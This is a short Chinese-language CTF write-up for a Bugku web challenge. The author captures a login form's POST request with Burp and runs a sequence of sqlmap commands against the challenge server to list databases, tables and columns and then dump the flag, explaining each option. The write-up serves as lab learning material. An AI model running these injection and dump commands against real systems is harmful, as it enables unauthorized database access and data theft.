这是一个神奇的登录框（Bugku-web题 使用sqlmap注入实例）

正在学习sqlmap，拿这个题先入门一下。

题目链接：http://120.24.86.145:9001/sql/

先看下源代码：

是post提交，url明显提示是个sql注入，由于post提交，要sql和burp结合起来使用。

首先burp抓包，抓到包后选择存到txt文件中：（随便输入账号密码）

我保存到了D盘的1.txt里。

然后打开sqlmap，输入指令：sqlmap.py -r "D:\1.txt" -p admin_name --dbs

解释一下 -r是读文件 后面是刚才保存的绝对路径，-p是参数，也就是注入点（选了admin_name是注入点） --dbs意思是想获取数据库名字

可以看到sqlmap获得了数据库的名字：

应该是这个bugkul1，再继续爆表，命令：sqlmap.py -r "D:\1.txt" -D bugkusql1 -p admin_name --tables

解释：-D是表示选择了后面的这个数据库 --tables是想获取表

可以看到爆出了表：

应该在flag1这个表里，继续爆列名：

命令：sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --columns

解释类似上面 不过加了一个-T 指定表

可以发现爆出了列名：

flag1这个列 最后查字段 命令：sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump

解释：同上面 --dump是获取字段的命令

（在这过程中可能会让你选择Y或者N 我直接回车的）

可以看到爆出了flag：